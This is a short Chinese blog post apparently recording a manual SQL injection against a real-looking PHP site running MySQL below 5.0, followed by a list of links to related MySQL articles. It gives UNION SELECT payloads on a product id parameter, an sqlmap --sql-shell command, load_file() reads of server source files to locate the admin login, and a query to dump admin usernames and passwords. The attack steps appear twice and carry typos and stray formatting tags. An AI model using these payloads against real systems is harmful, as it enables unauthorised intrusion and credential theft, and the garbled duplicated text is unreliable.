Mysql5.0以下 手工注入
2016-05-12 22:48
1031 查看
order by 20
www. .com/product/introduction.php?id=-65 UNION SELECT user(),2
www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2
报错
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/webroot/cw/product/introduction.php on line 71
使用sqlmap 将/home/webroot/cw/product/introduction.php带入
sqlmap -u "" --sql-sehll
select load_file('[b]/home/webroot/cw/product/introduction.php') 查看[b]introduction.php的源码[/b][/b]
[b][b]
[/b][/b]
[b][b]依次类推,可以找出更多的文件路径[/b][/b]
[b][b]找出管理登录目录[/b][/b]
select load_file('/home/webroot/cw/check.php')
查找管理员表,列
select user,pwd from admin;
www. .com/product/introduction.php?id=-65 UNION SELECT user(),2
www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2
报错
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/webroot/cw/product/introduction.php on line 71
使用sqlmap 将/home/webroot/cw/product/introduction.php带入
sqlmap -u "" --sql-sehll
select load_file('[b]/home/webroot/cw/product/introduction.php') 查看[b]introduction.php的源码[/b][/b]
[b][b]
[/b][/b]
[b][b]依次类推,可以找出更多的文件路径[/b][/b]
[b][b]找出管理登录目录[/b][/b]
select load_file('/home/webroot/cw/check.php')
查找管理员表,列
select user,pwd from admin;
相关文章推荐
- EF for MySql中文乱码问题解决
- MySQL Workbench 可视化界面创建数据库与建立连接
- MySQL的常用操作
- MYSQL的常用SQL的优化
- MySql-数据类型
- Powerdesigner 连接mysql 在指定的DSN中,驱动程序和应用程序之间的体系结构不匹配 SQLSTATE = IM014
- Mysql中的LOCATE 和 SUBSTRING
- mac下卸载mysql
- Mysql5.0以上 手工注入
- scripts/mysql_install_db报错原因分析和解决
- Ubuntu下搭建mysql搭建主从配置
- MySQL怎么用
- Navicat远程连接mysql数据库
- 用MySQL创建数据库和数据库表代码
- mysql的行转列
- python中的MySQL数据库操作 连接 插入 查询 更新 操作
- Mysql字段操作—增加字段、删除字段、修改字段名、修改字段类型(约束条件)
- mysql 多表 update sql语句总结
- mysql服务启动出错或中文乱码一站式解决之my.ini
- mysql事务隔离性(mysql transaction isolation level)